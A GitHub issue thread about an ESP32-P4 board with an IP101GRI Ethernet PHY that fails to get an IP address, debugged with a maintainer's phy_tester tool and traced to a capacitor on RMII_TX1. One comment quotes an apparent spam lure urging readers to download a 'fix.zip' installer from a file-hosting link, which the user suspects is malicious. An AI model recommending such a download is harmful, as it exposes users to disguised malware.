espressif/esp-idf #14428: ESP32-P4 IP101GRI running bug

Y1hsiaochunnn, 2024-08-23:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### General issue report

I am using ESP32-P4 chip to enable IP101GRI, using the same schematic design as ESP32-P4 Function_EV_Board V1.4, including GPIO, the difference is that I use a network port material with POE function, and now I find that, When I was in running https://github.com/espressif/esp-idf/tree/master/examples/ethernet/basic ESP32 - P4 Function_EV_Board V1.4 is access to the IP address, The custom board does not get the IP address

When I open the log, I find that the custom board can receive data, and can also detect the plug and unplug action of the network port, so where might the problem occur?

The following is the log,At the end of the log, At the end of the log, instead of printing the IP address as expected, it circulates through the data address:
[image]

Y1hsiaochunnn, 2024-08-23:
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

for hacking in my comp?

kostaond, 2024-08-26:
Hi, there might be some issue with hardware. Could be anything... Could you please try to run https://github.com/espressif/esp-eth-drivers/tree/feature/phy_tester/phy_tester Please read the README, run the pytest and send the log.

Y1hsiaochunnn, 2024-08-26:
Hi @kostaond ,
Thanks for the reply,I tried to use pytest --target=esp32 --eth_nic=YOUR_NIC_NAME. I changed it to pytest --target=esp32p4 --eth_nic=ip?

kostaond, 2024-08-26:
`eth_nic` is name of your interface. Are you on Linux? The test has been currently tested on Linux only. 

Anyway, run `ip` command in Linux terminal, and you get something like:
```
2: enp2s0f0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 8c:8c:aa:1d:99:6c brd ff:ff:ff:ff:ff:ff
    inet 10.10.20.1/24 brd 10.10.20.255 scope global noprefixroute enp2s0f0
       valid_lft forever preferred_lft forever
    inet6 fe80::8e8c:aaff:fe1d:996c/64 scope link 
       valid_lft forever preferred_lft forever
```

The interface name for IP 10.10.20.1 is **enp2s0f0** in my particular case.

Y1hsiaochunnn, 2024-08-26:
Do you mean to use a cable to connect to my Linux host after burning the code? I did this, but I didn't know what command eth_phy should send, so I couldn't find the corresponding network port device on Linux

Y1hsiaochunnn, 2024-08-26:
btw, same situation with ESP32-P4 Function_EV_Board V1.4

Y1hsiaochunnn, 2024-08-26:
Simple enough, I can confirm which network card I have, but unfortunately pytest doesn't seem to recognize the network card

kostaond, 2024-08-26:
Yes, you need to directly* 
 connect your device under test (DUT) to your Linux machine. Then:
* Give sufficient rights to python to open RAW Ethernet socket as describe in [README](https://github.com/espressif/esp-eth-drivers/tree/feature/phy_tester/phy_tester#known-limitations). 
* Identify Ethernet Network Interface (NIC) to which the DUT is connected to. Use the `ip` command as I already mentioned. How many Ethernet ports does your PC have? If just one, it's simple, the name usually starts with `enp` or `eno`. If it is connected via USB, it's usually device MAC address.
* Run the `pytest`

If you don't manage to run it. You can run the tests in DUT manually. You can run loopback, you can send to you PC and monitor traffic using Wireshark...

Y1hsiaochunnn, 2024-08-26:
> > Simple enough, I can confirm which network card I have, but unfortunately pytest doesn't seem to recognize the network card
> 
> What is the error? Have you given sufficient rights to python to open RAW Ethernet socket?

ERROR: usage: pytest [options] [file_or_dir] [file_or_dir] [...]
pytest: error: unrecognized arguments: --eth_nic=enx00e04c7ebce0
  inifile: None

my eth_nic name is **enx00e04c7ebce0**

Y1hsiaochunnn, 2024-08-26:
command is pytest --target=esp32p4 --eth_nic=enx00e04c7ebce0

kostaond, 2024-08-26:
> command is pytest --target=esp32p4 --eth_nic=enx00e04c7ebce0

I can reproduce. I'll have a look at it.

Are you able to run loop test on ESP32-P4 Function_EV_Board V1.4?

Y1hsiaochunnn, 2024-08-26:
> > command is pytest --target=esp32p4 --eth_nic=enx00e04c7ebce0
> 
> I can reproduce. I'll have a look at it.
> 
> Are you able to run loop test on ESP32-P4 Function_EV_Board V1.4?

It works well on ESP32-P4 Function_EV_Board V1.4, but my development board wiring and capacitor resistance Settings are the same, where will the problem occur?

Y1hsiaochunnn, 2024-08-27:
> > command is pytest --target=esp32p4 --eth_nic=enx00e04c7ebce0
> 
> I can reproduce. I'll have a look at it.
> 
> Are you able to run loop test on ESP32-P4 Function_EV_Board V1.4?

Hi @kostaond ,
Have you ever had the same problem with this chip as I have? Are the above problems repeated

kostaond, 2024-08-27:
The problem is there was a certain update how to run `pytest` outside of the ESP-IDF repo folder. I'll address it today and commit the updated script. There is no issue with chip.

Y1hsiaochunnn, 2024-08-27:
> The problem is there was a certain update how to run `pytest` outside of the ESP-IDF repo folder. I'll address it today and commit the updated script. There is no issue with chip.

As for the problem that I cannot identify the IP, is it possible that the 50Mhz clock is affected? Can I avoid this problem by attaching an external clock oscillator?

Y1hsiaochunnn, 2024-08-27:
Recent tests show that when I use loop-server and connect to the network cable test, it can receive and send data normally. When I use loop-test, it does not work. What is the cause? It seems to be working, but there is some kind of data loss
[image]

Y1hsiaochunnn, 2024-08-27:
Hi @kostaond ,
I solved this exception, because the capacitor on my RMII_TX1 led to a different power-on order. After I removed them, they can work normally. Thank you very much for your support

kostaond, 2024-08-27:
@Y1hsiaochunnn  great to hear you were able to resolve the issue! The only pity is that we couldn't use the test script since this is exactly the case where it is designed to help. Do you have multiple boards with the same issue? If so, it would help me a lot if you could run the test to see if the script is really able to isolate such issue. The script has been updated. Now, the command to start it changed, please check the README.

Y1hsiaochunnn, 2024-08-27:
Hi @kostaond ,
phy_tester is a great tool, and I was able to find the problem by running loop-test and loop-server to see what was wrong. If I need verification, I can reproduce my problem. Of course, I will definitely not use IP101GRI IC in the future. If I encounter problems using phy_tester while using ETH function, I will create an issue under esp-eth-drivers project.

If there are no other suggestions or tool recommendations, I will close this issue

kostaond, 2024-08-27:
It's nice that the tool actually help you! If you had any issue or recommendation, don't hesitate to ask. This issue can be closed. Thanks.

closed 2024-08-27 by kostaond